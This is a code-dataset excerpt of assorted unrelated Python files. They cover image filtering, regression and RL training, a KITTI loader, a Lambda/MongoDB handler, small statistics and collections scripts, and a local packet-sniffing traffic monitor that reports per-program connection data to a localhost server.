np.exp(-((x-x_zero)**2.0/(2*sigma_x**2.0)+(y-y_zero)**2.0/(2*sigma_y**2.0)))/(2*np.pi*sigma_x*sigma_y)\n\tgaussian = gaussian #+ random.standard_normal((N,N)) * s\n\n\t# plot (gaussian, \"PSF\", \"04_PSF\")\t\n\t# plot2D(x,y,gaussian,\"PSF\")\n\n\tC = sig.convolve (hdu, gaussian, 'same')\n\thdu[:][:] = C[:][:]\n \ndef addNoise (hdu, sigma):\n # Agrega ruido Gaussiano de desviacion estandard sigma a hdu.\n hdu += random.standard_normal((maxROW,maxCOL))*sigma\n\ndef filterImage (hdu, params):\n # Filtra hdu utilizando los parametros params.\n fft_cut = params[0]\n header = params[1]\n\n Y = fft.fft(hdu)\n # plot_image(Y,log_scale=True)\n\n N = len(hdu)\n\n N_corte = fft_cut\n for i in range(N):\n \tfor j in range(N):\n \t\tif ((i+N/2)%N - N/2)**2 + ((j+N/2)%N - N/2)**2 > (N_corte)**2:\n \t\t\tY[i][j] = 0.0\n\n # Ymin = np.abs(Y).min()\n # Y[fft_cut : N - fft_cut] = 0.\n # Yabs = np.abs(Y)\n # plot (np.log(Yabs * (Yabs > 0) + (Yabs <= 0)*Ymin*1e-1), \"FFT\", \"06_FFT_cut\")\n\n y1 = np.abs((fft.ifft (Y)))\n hdu[:][:] = y1[:][:]\n","sub_path":"metodos_t1.py","file_name":"metodos_t1.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"332430853","text":"from pandas.io.parsers import read_csv\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nimport pandas as pd\n\ndf = read_csv('C:\\\\Users\\\\simon\\\\OneDrive\\\\Dokumenter\\\\NTNU\\\\Dataingeniør 2021-2022\\\\Høst\\\\IDATT2502 - Anvendt maskinlæring med prosjekt\\\\ObligsMachineLearning\\\\Oblig1\\\\day_head_circumference.csv', skiprows=0)\n\nx_axis = df.iloc[:,0].values\ny_axis = df.iloc[:,1].values\n\nx_train = torch.tensor([x_axis], dtype=torch.float32).reshape(-1, 1)\ny_train = torch.tensor([y_axis], dtype=torch.float32).reshape(-1, 1)\n\nclass LinearRegressionModel:\n def __init__(self): \n # Model variables\n self.W = torch.tensor([[0.0]], requires_grad=True) # requires_grad enables calculation of gradients\n self.b = torch.tensor([[0.0]], requires_grad=True)\n \n # Predictor\n def f(self, x):\n return (20*torch.sigmoid(x @ self.W + self.b) + 31) \n\n # Uses Mean Squared Error\n def loss(self, x, y):\n return torch.nn.functional.mse_loss(self.f(x), y)\n\nmodel = LinearRegressionModel()\n\n# Optimize: adjust W and b to minimize loss using stochastic gradient descent\noptimizer = torch.optim.SGD([model.W, model.b], 0.000001)\n\nfor epoch in range(1000000):\n model.loss(x_train, y_train).backward() # Compute loss gradients\n optimizer.step() # Perform optimization by adjusting W and b,\n\n optimizer.zero_grad() # Clear gradients for next step\n\n# Print model variables and loss\nprint(\"W = %s, b = %s, loss = %s\" % (model.W, model.b, model.loss(x_train, y_train)))\n\n# Visualize result\nplt.plot(x_train, y_train, 'o', label='$(x^{(i)},y^{(i)})$')\nplt.xlabel('x')\nplt.ylabel('y')\n\nx = torch.arange(torch.min(x_train), torch.max(x_train), 1.0).reshape(-1, 1)\nplt.plot(x, model.f(x).detach(), label='$\\\\hat y = f(x) = sigmoid(xW + b) + 31')\n\nplt.legend()\nplt.show()\n\n","sub_path":"Oblig1/SolutionC.py","file_name":"SolutionC.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328076123","text":"import json\nimport pymongo\nimport boto3\nimport base64\nimport configparser\nimport os\nimport ast\nimport requests\nimport confidential\nfrom bson.son import SON\n\nDIST_THRESHOLD = 16000000\n\nclient = None\n\ndef lambda_handler(event, context):\n global client\n\n if not client:\n client = pymongo.MongoClient(confidential.MONGO)\n\n body = json.loads(event[\"body\"])\n\n user_lat = body[\"latitude\"]\n user_lon = body[\"longitude\"]\n \n if (user_lat == None or user_lon == None):\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({ \"available\" : True })\n }\n\n db = client[\"database0\"]\n stores = db[\"stores\"]\n\n query = {\"coordinates\": {\"$near\": SON([(\"$geometry\", SON([(\"type\", \"Point\"), (\"coordinates\", [user_lon, user_lat])])), (\"$maxDistance\", DIST_THRESHOLD)])}}\n \n r = stores.find_one(query)\n\n if not r:\n \treturn {\n \t\t\"statusCode\": 200,\n \t\t\"body\": json.dumps({ \"available\" : False })\n \t}\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({ \"available\" : True })\n }\n","sub_path":"lambda/src/check-region-availability.py/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"604930236","text":"import utils\nimport sklearn\nimport numpy as np\nfrom pathlib import Path\nfrom tf_imports import K, tf_summary\nfrom tf_imports import EarlyStopping\nfrom abc import ABC, abstractmethod\nfrom callbacks import OutputCheckpoint, TensorBoard2, CheckNanLoss\nfrom keras.utils import plot_model\n\n\nclass BaseModel(ABC):\n def __init__(self, input_shape):\n self.input_shape = input_shape\n self.optimizer = None\n self.loss = None\n\n model = self._create_model(input_shape)\n # model.summary()\n\n self.model = model\n self.model_compiled = False\n\n @abstractmethod\n def _create_model(self, input_shape):\n pass\n\n @abstractmethod\n def plot_model(self, save_to_dir):\n pass\n\n @staticmethod\n def _plot_model(model, file_path):\n plot_model(model, to_file=file_path, show_shapes=True, show_layer_names=True)\n print(model.summary())\n\n def compile(self, optimizer, loss):\n if self.model_compiled:\n raise Exception(\"The model was already compiled.\")\n\n self._compile(optimizer, loss)\n\n @abstractmethod\n def _compile(self, optimizer, loss):\n pass\n\n def train(self, x, y, batch_size, out_folder, output_checkpoint_inputs_word2vec=None):\n if not self.model_compiled:\n raise Exception(\"The model must be compiled first.\")\n\n train_uid = utils.uid()\n description = \"{train_uid} batch={batch_size} cfg_index={cfg_idx}\"\\\n .format(train_uid=train_uid, batch_size=batch_size, cfg_idx=self.cfg_idx)\n print(\"Training: {}\".format(description))\n\n # callbacks\n callbacks = []\n\n early_stopping = EarlyStopping(\n monitor='val_loss',\n min_delta=0.02,\n patience=20,\n verbose=1,\n mode='min',\n restore_best_weights=True)\n callbacks.append(early_stopping)\n\n check_nan = CheckNanLoss('val_loss')\n callbacks.append(check_nan)\n\n tensor_board_log_dir = Path(out_folder, \"tensorboard\", description)\n tensor_board_log_dir.mkdir(parents=True, exist_ok=True)\n tensor_board_writer = tf_summary.FileWriter(str(tensor_board_log_dir), K.get_session().graph)\n\n if output_checkpoint_inputs_word2vec is not None:\n output_checkpoint = OutputCheckpoint(\n tensor_board_writer=tensor_board_writer,\n val_data=(x[:4], y[:4]),\n test_data_input_word2vec=output_checkpoint_inputs_word2vec,\n print_every=30)\n callbacks.append(output_checkpoint)\n\n # last because close the writer on training end\n tensor_board = TensorBoard2(writer=tensor_board_writer, batch_size=batch_size)\n callbacks.append(tensor_board)\n\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(x, y, train_size=0.8, shuffle=True)\n\n # fit\n self.model.fit(\n x=x_train,\n y=y_train,\n epochs=300,\n batch_size=batch_size,\n verbose=1,\n shuffle=True,\n callbacks=callbacks,\n validation_data=(x_test, y_test),\n )\n\n # save\n weights_path = Path(out_folder, \"weights\", \"{}.h5\".format(description))\n weights_path.parent.mkdir(parents=True, exist_ok=True)\n # self.model.save_weights(str(weights_path))\n\n def load_weights(self, weights_file_path):\n if not Path(weights_file_path).exists():\n raise Exception(\"weights file '{}' not found.\".format(weights_file_path))\n\n self.model.load_weights(str(weights_file_path))\n\n def predict(self, x_predict):\n prediction = self.model.predict(x=x_predict, batch_size=128)\n return prediction\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419238243","text":"# --------------------------------------\n# Multi-Agent Deep Deterministic Policy Gradient (MADDPG)\n# Author: Adrian Chow\n# Date: 2020.1.16\n# Reference: https://papers.nips.cc/paper/2017/file/68a9750337a418a86fe06c1991a1d64c-Paper.pdf\n# Purpose: Adaption for Multi-Agent Environments for DDPG\n# --------------------------------------\n\nimport numpy as np\nfrom collections import namedtuple, deque\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom OUNoise import OrnsteinUhlenbeckNoise\nfrom Networks import Actor, Critic\nfrom Buffer import ReplayBuffer\n\nBUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 250 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR_ACTOR = 1e-4 # learning rate of the actor \nLR_CRITIC = 1e-3 # learning rate of the critic\nWEIGHT_DECAY = 0. # L2 weight decay\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass MADDPG:\n \"\"\" Class for training multiple agents in the multi-agent environment\"\"\"\n\n def __init__(self, state_size, action_size, num_agents, seed):\n \n super(MADDPG, self).__init__()\n self.state_size = state_size\n self.action_size = action_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)\n\n # Initialize agents in the multi-agent environment\n self.DDPGs = [DDPG(state_size, action_size, num_agents, seed) for i in range(num_agents)]\n \n # Replay Buffer (shared by all agents)\n self.memory = ReplayBuffer(action_size, num_agents, BUFFER_SIZE, BATCH_SIZE, seed, device)\n\n\n def act(self, states, add_noise=True):\n \"\"\"Returns actions for each agent.\"\"\"\n\n return [agent.act(state, add_noise) for agent, state in zip(self.DDPGs, states)]\n\n\n def step(self, states, actions, rewards, next_states, dones):\n\n self.memory.add(states, actions, rewards, next_states, dones)\n \n for agent in self.DDPGs:\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample()\n agent.step(experiences, GAMMA)\n \n\n def reset(self):\n \"\"\" Reset Agents \"\"\"\n for agent in self.DDPGs:\n agent.reset() \n\n\n def save_weights(self):\n for index, agent in enumerate(self.DDPGs):\n torch.save(agent.actor.state_dict(), 'agent{}_checkpoint_actor.pth'.format(index+1))\n torch.save(agent.critic.state_dict(), 'agent{}_checkpoint_critic.pth'.format(index+1))\n\n\nclass DDPG:\n \"\"\" Base Class for an Agent in the multi-agent environment\"\"\"\n\n def __init__(self, \n state_size, \n action_size,\n num_agents,\n seed, \n hidden_in_actor=200,\n hidden_out_actor=150,\n hidden_in_critic=200, \n hidden_out_critic=150, \n lr_actor=LR_ACTOR, \n lr_critic=LR_CRITIC):\n\n super(DDPG, self).__init__()\n\n self.state_size = state_size\n self.action_size = action_size\n self.num_agents = num_agents\n self.seed = random.seed(seed)\n \n self.actor = Actor(state_size, \n action_size,\n seed,\n hidden_in_actor,\n hidden_out_actor).to(device)\n\n self.target_actor = Actor(state_size, \n action_size,\n seed,\n hidden_in_actor,\n hidden_out_actor).to(device)\n\n self.critic = Critic(state_size, \n action_size,\n num_agents,\n seed,\n hidden_in_critic,\n hidden_out_critic).to(device)\n\n self.target_critic = Critic(state_size, \n action_size,\n num_agents,\n seed,\n hidden_in_critic,\n hidden_out_critic).to(device)\n \n # Ornstein Uhlenbeck Noise for Action Space Exploration\n self.noise = OrnsteinUhlenbeckNoise(action_size, seed) \n\n # Initialize targets same as original networks\n self.copy_weights(self.critic, self.target_critic)\n self.copy_weights(self.actor, self.target_actor)\n\n # Actor and Critic Adam Optimizers\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=lr_actor)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=lr_critic)\n\n\n def act(self, state, add_noise=True):\n \"\"\"Returns actions for given state as per current policy.\"\"\"\n \n state = torch.from_numpy(state).float().to(device)\n self.actor.eval()\n with torch.no_grad():\n action = self.actor(state).cpu().data.numpy()\n self.actor.train()\n if add_noise:\n action += self.noise.noise()\n return np.clip(action, -1, 1)\n\n\n def step(self, experiences, gamma):\n self.learn(experiences, gamma)\n\n\n def learn(self, experiences, gamma):\n \"\"\"Update policy and value parameters using given batch of experience tuples.\n Q_targets = r + γ * target_critic(next_state, target_actor(next_state))\n where:\n target_actor(state) -> action\n target_critic(state, action) -> Q-value\n Params\n ======\n experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', a2, s2' done) tuples \n gamma (float): discount factor\n \"\"\"\n\n states, actions, rewards, next_states, dones = experiences\n\n next_states_tensor = torch.cat(next_states, dim=1).to(device)\n states_tensor = torch.cat(states, dim=1).to(device)\n actions_tensor = torch.cat(actions, dim=1).to(device) \n\n # ---------------------------- update critic ---------------------------- #\n # Get predicted next-state actions and Q values from target models\n \n next_actions = [self.actor(state) for state in states] \n next_actions_tensor = torch.cat(next_actions, dim=1).to(device) \n Q_targets_next = self.target_critic(next_states_tensor, next_actions_tensor)\n # Compute Q targets for current states (y_i)\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n # Compute critic loss\n Q_expected = self.critic(states_tensor, actions_tensor)\n critic_loss = F.mse_loss(Q_expected, Q_targets)\n # Minimize the loss\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # ---------------------------- update actor ---------------------------- #\n # Compute actor loss\n actions_pred = [self.actor(state) for state in states] \n actions_pred_tensor = torch.cat(actions_pred, dim=1).to(device)\n actor_loss = -self.critic(states_tensor, actions_pred_tensor).mean()\n # Minimize the loss, thererby maximizing the reward\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # ----------------------- update target networks ----------------------- #\n self.soft_update(self.critic, self.target_critic, TAU)\n self.soft_update(self.actor, self.target_actor, TAU) \n\n\n def soft_update(self, local_model, target_model, tau):\n \"\"\"Soft update model parameters.\n θ_target = τ*θ_local + (1 - τ)*θ_target\n Params\n ======\n local_model: PyTorch model (weights will be copied from)\n target_model: PyTorch model (weights will be copied to)\n tau (float): interpolation parameter \n \"\"\"\n for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n\n def reset(self):\n self.noise.reset() \n\n\n def copy_weights(self, source, target):\n \"\"\"Copies the weights from the source to the target\"\"\"\n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(source_param.data)\n","sub_path":"MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135642075","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nf = open(\"../data/CURVES_FeGaPd.txt\", \"r\")\n\ndata = f.read().split(\"\\n\")\nf.close()\n\nt = data[0].split(\" \")[1:]\n\nt = [float(x) for x in t]\nt = np.array(t)\nt = (t - t[0]) / (t[t.size-1] - t[0])\narray_of_curves = []\ni = 1\nwhile i < len(data):\n temp = data[i].split(\" \")[1:]\n temp = [float(x) for x in temp]\n temp = np.array(temp)\n temp = (temp - temp.min())\n temp = temp / (temp.max())\n array_of_curves.append(temp)\n i = i + 1\narray_of_curves = np.array(array_of_curves)\ntemp = array_of_curves[0]\ngradient1 = np.gradient(temp, t)\ngradient1[gradient1 == 0] = 1\nsrvf1 = gradient1 / np.sqrt(np.abs(gradient1))\nsrvf1 = (srvf1 - srvf1.min()) / (srvf1.max() - srvf1.min())\nfig, ax = plt.subplots()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_color('#FFFFFF')\nax.spines['left'].set_color('#FFFFFF')\nplt.plot(t, srvf1, \"#FC5C5C\")\nax.set_xticks([])\nax.set_yticks([])\nplt.savefig(\"SRVF\", transparent=True)\n\n\nplt.show()","sub_path":"testing/old/material_curve_visualiser.py","file_name":"material_curve_visualiser.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"357125303","text":"from scapy3k.all import *\nimport socket\nfrom subprocess import Popen\nimport json\nfrom urllib.request import urlopen\nfrom ipaddress import ip_address\nfrom threading import Thread\nfrom re import findall\n\nGET_COUNTRY = \"http://ip-api.com/json/\"\nSERVER_IP = \"127.0.0.1\"\nNUMBER_OF_SNIFFING_ROUNDS = 1\nSERVER_PORT = 8814\nSELF_IP = socket.gethostbyname(socket.gethostname())\nCMD_COMMAND = \"netstat -on\"\nWEB_SERVER_IP = \"54.71.128.194\"\n\nSOC = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nSERVER_ADDR = (SERVER_IP, SERVER_PORT)\n\n#the \"cache\" to make sure the same IP isn't checked twice\ncountrys = {}\n\n\ndef main():\n while True:\n sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=for_packet)\n\n\ndef fltr(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: True if the packet contain an IP and TCP or UDP layer AND the packet is not from a private network\n \"\"\"\n try:\n return IP in packet and (UDP in packet or TCP in packet) and\\\n not ip_address(get_ip(packet)).is_private and\\\n get_ip(packet) != WEB_SERVER_IP\n except:\n return False #if for some reason this check crashes, oddities, it means i don't want this packet\n\n\ndef for_packet(packet):\n \"\"\"\n Function will print out the ip directions of the packet, for convinience, and will start the proccessing thread\n :param packet: the packet object that i'm checking for\n :return: None\n \"\"\"\n proccessing_thread = Thread(target=process_packet_and_send, args=(packet,))\n proccessing_thread.start()\n try:\n return packet[IP].src + \" ---> \"+packet[IP].dst\n except:\n return \"An error has accoured\"\n\n\ndef is_entering(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: weather or not the packet is entering the pc or not\n \"\"\"\n if packet[IP].src != SELF_IP:\n return True\n else:\n return False\n\n\ndef get_ip(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: The ip in the packet that does not belong to me, IE the ip that i'm talking with\n \"\"\"\n if is_entering(packet):\n return packet[IP].src\n else:\n return packet[IP].dst\n\n\ndef get_country(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the country that the hosts the ip i'm talking with\n \"\"\"\n #while you probobly can do it without it being global, it's far easier this way\n global countrys\n if get_ip(packet) in countrys.keys():\n return countrys[get_ip(packet)]\n else:\n res = json.loads(urlopen(GET_COUNTRY + get_ip(packet)).read().decode('utf-8'))\n try:\n countrys[get_ip(packet)] = res[\"country\"]\n except:\n countrys[get_ip(packet)] = \"Unknown\"\n return countrys[get_ip(packet)]\n\n\ndef get_partner_port(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the DST port of the packet\n \"\"\"\n if is_entering(packet):\n return packet.sport\n else:\n return packet.dport\n\n\ndef get_port(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the internal port of the packet\n \"\"\"\n if is_entering(packet):\n return packet.dport\n else:\n return packet.sport\n\n\ndef get_program(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the program that the packet belongs to\n \"\"\"\n port = str(get_port(packet))\n process = Popen(CMD_COMMAND, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n output, error = process.communicate()\n output= output.decode()\n results = findall(port+\" +[\\d\\.]+:\\d+ +[A-Z]+ +(\\d+)\", output)\n try:\n process = Popen(\"tasklist | findstr /c:\"+results[0], shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n program = process.communicate()[0].decode()\n results = findall(\".+\\.exe\",program)\n return results[0]\n except:\n pass\n return \"Unknown\"\n#there are 2 cases in which it will be unknown,\n#one is when the src port of the packet is not found amongst the list of netstat\n#two is for oddities\n\n\ndef process_packet_and_send(packet):\n proccessed = {\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)}\n\n message = json.dumps((SELF_IP, [proccessed]))\n SOC.sendto(message.encode(), SERVER_ADDR)\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"expiriment agent.py","file_name":"expiriment agent.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"219803622","text":"import os\nimport numpy as np\nimport torch.utils.data as torch_data\nimport lib.utils.calibration as calibration\nimport lib.utils.kitti_utils as kitti_utils\nimport lib.utils.object3d as object3d\nfrom PIL import Image\nimport glob\n\n\nclass KittiTrackingDataset(torch_data.Dataset):\n def __init__(self, root_dir, split='train'):\n self.split = split\n is_test = self.split == 'test'\n # self.imageset_dir = os.path.join(root_dir, 'KITTI', 'object', 'testing' if is_test else 'training')\n self.imageset_dir = os.path.join(root_dir, 'KITTI_TRACKING', 'object', 'testing' if is_test else 'training')\n\n # split_dir = os.path.join(root_dir, 'KITTI', 'ImageSets', split + '.txt')\n # self.image_idx_list = [x.strip() for x in open(split_dir).readlines()]\n # self.num_sample = self.image_idx_list.__len__()\n self.video_idx_list, self.image_count_list, self.image_name_list = self.get_image_count_list(self.imageset_dir)\n # print(self.image_idx_list[0])\n self.image_idx_list = ['%06d' % idx for idx in range(np.sum(self.image_count_list))]\n self.num_sample = np.sum(self.image_count_list)\n\n self.image_dir = os.path.join(self.imageset_dir, 'image_02')\n self.lidar_dir = os.path.join(self.imageset_dir, 'velodyne')\n self.calib_dir = os.path.join(self.imageset_dir, 'calib')\n self.label_dir = os.path.join(self.imageset_dir, 'label_02')\n self.plane_dir = os.path.join(self.imageset_dir, 'planes')\n\n def convert_idx(self, idx):\n image_count_cumsum = np.cumsum(self.image_count_list)\n # print(image_count_cumsum)\n for i in range(len(image_count_cumsum)):\n if idx >= image_count_cumsum[i]:\n continue\n\n else:\n if i == 0:\n frame_id_in_video = idx\n else:\n frame_id_in_video = idx - image_count_cumsum[i-1]\n frame_id = self.image_name_list[i][frame_id_in_video] # string\n video_id = self.video_idx_list[i] # string\n break\n\n return video_id, frame_id\n\n def get_image_count_list(self, imageset_dir):\n video_idx_list = sorted(glob.glob(imageset_dir + '/velodyne/*/'))\n image_name_list = []\n # print(video_idx_list)\n folder_idx_list = []\n image_count_list = []\n for dir_name in video_idx_list:\n folder_idx_list.append(os.path.basename(os.path.normpath(dir_name))) # e.g. 0000\n image_idx_in_video = sorted(glob.glob(dir_name + '/*'))\n image_name_list.append([os.path.splitext(os.path.basename(image_name))[0] for image_name in image_idx_in_video]) # e.g. 000000\n image_count_list.append(len(image_idx_in_video)) # e.g. 154\n \n return folder_idx_list, image_count_list, image_name_list\n\n def get_image(self, idx):\n assert False, 'DO NOT USE cv2 NOW, AVOID DEADLOCK'\n import cv2\n # cv2.setNumThreads(0) # for solving deadlock when switching epoch\n img_file = os.path.join(self.image_dir, '%06d.png' % idx)\n assert os.path.exists(img_file), img_file\n return cv2.imread(img_file) # (H, W, 3) BGR mode\n\n def get_image_shape(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n img_file = os.path.join(self.image_dir, video_id, frame_id+'.png')\n # img_file = os.path.join(self.image_dir, '%06d.png' % idx)\n assert os.path.exists(img_file), img_file\n im = Image.open(img_file)\n width, height = im.size\n return height, width, 3\n\n def get_lidar(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n lidar_file = os.path.join(self.lidar_dir, video_id, frame_id+'.bin')\n # lidar_file = os.path.join(self.lidar_dir, '%06d.bin' % idx)\n assert os.path.exists(lidar_file), lidar_file\n return np.fromfile(lidar_file, dtype=np.float32).reshape(-1, 4)\n\n def get_calib(self, idx):\n video_id, _ = self.convert_idx(idx)\n calib_file = os.path.join(self.calib_dir, video_id+'.txt')\n assert os.path.exists(calib_file), calib_file\n return calibration.Calibration(calib_file)\n\n def get_label(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n label_file = os.path.join(self.label_dir, video_id+'.txt')\n assert os.path.exists(label_file), label_file\n # return kitti_utils.get_objects_from_label(label_file)\n return self.get_label_with_frame_id(label_file, frame_id)\n\n def get_label_with_frame_id(self, label_file, frame_id):\n if isinstance(frame_id, str):\n frame_id = int(frame_id)\n\n with open(label_file, 'r') as f:\n lines = f.readlines()\n\n objects = []\n \n for line in lines:\n label = line.strip().split(' ')\n line_frame_id = int(label[0])\n if line_frame_id == frame_id:\n objects.append(object3d.Object3d(\" \".join(label[2:])))\n\n return objects\n\n def get_road_plane(self, idx):\n assert False, 'WE DONNOT HAVE ROAD PLANE DATA'\n plane_file = os.path.join(self.plane_dir, '%06d.txt' % idx)\n with open(plane_file, 'r') as f:\n lines = f.readlines()\n lines = [float(i) for i in lines[3].split()]\n plane = np.asarray(lines)\n\n # Ensure normal is always facing up, this is in the rectified camera coordinate\n if plane[1] > 0:\n plane = -plane\n\n norm = np.linalg.norm(plane[0:3])\n plane = plane / norm\n return plane\n\n def __len__(self):\n raise NotImplementedError\n\n def __getitem__(self, item):\n raise NotImplementedError\n","sub_path":"lib/datasets/kitti_tracking_dataset.py","file_name":"kitti_tracking_dataset.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"208587478","text":"import numpy as np\nfrom scipy import stats\nimport scipy\nimport math\n\n# if data is not a frequency distribution\nx = np.array([1,2,3,4,5])\nmean = np.mean(x)\nn = x.size\nx_minus_mean= x-mean\nx_minus_mean_square = np.square(x_minus_mean)\nx_minus_mean_square_sum = np.sum(x_minus_mean_square)\n\nstandard_deviation = math.sqrt(x_minus_mean_square_sum/n)\nprint(\"standard_deviation 1 : \",standard_deviation)\n\n# if dataset is frequency distribution\nx_square = np.square(x)\nf = np.array([6,16,24,25,19])\ncum_freq = np.array([6,22,46,71,90])\nf_x_square = f*x_square\n\nsum_f_x_square = np.sum(f_x_square)\nsum_f = np.sum(f)\nmean_square = math.pow(mean,2)\nstandard_deviation = math.sqrt((sum_f_x_square/sum_f) - mean_square)\n\nprint(\"standard_deviation 2 : \",standard_deviation)","sub_path":"Statistics/standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"347054612","text":"import numpy as np\nimport cv2\nimport tensorflow as tf\n\nglobal loaded_model, graph\n\n# Load json and create model\n\njson_file = open('model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\n\nfrom keras.models import model_from_json\nloaded_model = model_from_json(loaded_model_json)\n\n# Load weights into new model\n\nloaded_model.load_weights(\"model.h5\")\nloaded_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\ngraph = tf.get_default_graph()\n\n# Predicting the class of a new image\n\npred = \"name_of_image.jpg\"\nimg = cv2.imread(pred)\nimg = cv2.resize(img,(64,64))\nimg = np.reshape(img,[1,64,64,3])\nwith graph.as_default(): \n classes = loaded_model.predict_classes(img)\n res = ''\n if classes[0]==0:\n res = 'cat'\n else:\n res = 'dog'\n print(res)\n","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592551644","text":"\"\"\"\nThe collections module has a handy tool called defaultdict. The defaultdict is a subclass of Python’s dict that\naccepts a default_factory as its primary argument. The default_factory is usually a Python type, such as int or list,\nbut you can also use a function or a lambda too.\n\nIt’s basically impossible to cause a KeyError to happen as long as you set the default_factory to something that makes\nsense.\n\"\"\"\nfrom collections import defaultdict\n\n# Assume we have no Counter collection and we want to create a frequency distribution of the words appearing in a list\nfrequency_distribution = {}\nwords = ['gaurav', 'keswani', 'gaurav', 'yelp', 'snowflake', 'yelp', 'gaurav']\nfor word in words:\n # If the word is already present in the dictionary, increment the count by 1\n if word in frequency_distribution:\n frequency_distribution[word] += 1\n # If the word is not present in the dictionary, set the count to 1 since this is the first occurence\n else:\n frequency_distribution[word] = 1\nprint(frequency_distribution)\n\n# We can simplify the above process by using default dicts\n# Here we specify the default value type of the dict to be int. Thus, the default value of any key will be the default\n# value of type int i.e. 0\nfrequency_distribution = defaultdict(int)\nfor word in words:\n # The first time a word is encountered, it won't be in the dictionary. Thus, it frequency_distribution[word] will\n # have the value of 0 and will get 1 added to it.\n # Thus, the defaultdict will automatically assign zero as the value to any key it doesn’t already have in it\n frequency_distribution[word] += 1\nprint(frequency_distribution)\n\n\n","sub_path":"advanced_collections/defaultdict.py","file_name":"defaultdict.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123261089","text":"print('importing..')\nimport numpy as np\nimport sys\nfrom Bio import SeqIO\nfrom pyseqdist import hamming\n\n\ndef getseqs(input): #get sequences from 2 files\n seqs=[]\n input_handle = open(input) \n for record in SeqIO.parse(input_handle, \"fasta\"): # for FASTQ use \"fastq\", for fasta \"fasta\"\n if len(record.seq) > 0 and len(record.seq) < 50000:\n seqs.append(record.seq)\n input_handle.close()\n return seqs\n\ndef calcDistanceMatrix(seqs1,seqs2): #calculate distance matrix from the 1-step list\n hdist=hamming(seqs1,seqs2,ignore_gaps=False)\n l=len(seqs1)\n w=len(seqs2)\n arr=np.zeros([l,w])\n for id in range(len(hdist)):\n item=hdist[id]\n arr[:,id]=item[:,0]\n return arr\n \nif __name__==\"__main__\":\n seqs1=getseqs(sys.argv[1])\n seqs2=getseqs(sys.argv[2])\n print('calculating...')\n array=calcDistanceMatrix(seqs1,seqs2)\n val=np.amin(array)\n print(array)\n 